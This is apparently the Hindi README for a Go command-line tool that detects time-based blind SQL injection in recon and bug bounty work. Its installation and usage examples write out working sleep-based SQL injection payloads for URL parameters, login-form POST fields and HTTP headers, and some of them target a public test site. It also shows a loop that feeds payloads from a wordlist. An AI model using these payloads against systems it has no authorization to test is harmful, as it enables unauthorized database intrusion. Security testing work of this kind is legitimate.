
समय-आधारित ब्लाइंड SQL इंजेक्शन पहचान उपकरण, रीकॉन और बग बाउंटी के लिए। एकल URL या सूचियाँ स्वीकार करता है, कस्टम हेडर, प्रॉक्सी और स्वचालित भेद्यता स्कैनिंग के लिए POST डेटा का समर्थन करता है।
Jeeves 💀 स्थापित करना
$ go install github.com/ferreiraklet/Jeeves@latest
या
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
आपकी पुनर्जाँच प्रक्रिया में, आपको ऐसे एंडपॉइंट मिल सकते हैं जो SQL इंजेक्शन के प्रति संवेदनशील हो सकते हैं। उदाहरण: https://redacted.com/index.php?id=1
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10
--payload-time में आपको पेलोड में उल्लिखित समय का उपयोग करना होगा।
cat targets | jeeves --payload-time 5
सिंटैक्स पर ध्यान दें! समान होना चाहिए =>
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"
प्रॉक्सी + हेडर =>
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"
POST अनुरोध (लॉगिन फॉर्म आदि) के माध्यम से डेटा भेजना
सिंटैक्स पर ध्यान दें! समान होना चाहिए! ->
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"
आप Jeeves का उपयोग अन्य उपकरणों जैसे gau, gauplus, waybackurls, qsreplace और bhedak के साथ कर सकते हैं, इसकी शक्ति का लाभ उठाने के लिए।
कमांड लाइन फ़्लैग:
उपयोग:
-t, --payload-time, पेलोड का समय
-p, --proxy ट्रैफ़िक को प्रॉक्सी पर भेजें
-c समवर्ती सेट करें, डिफ़ॉल्ट 25
-H, --headers कस्टम हेडर
-d, --data POST अनुरोध डेटा के साथ भेजना
-h यह सहायता संदेश दिखाएँ
SQL पेलोड वर्डलिस्ट के साथ उपयोग
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
हेडर में परीक्षण
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
पेलोड क्रेडिट: https://github.com/rohit0x5
नोट:
यदि प्रोग्राम में कोई त्रुटि है, तो तुरंत मुझसे संपर्क करें।
Nilo - जाँचता है कि URL का स्थिति 200 है या नहीं
Blisqy हेडर टाइम-बेस्ड SQLI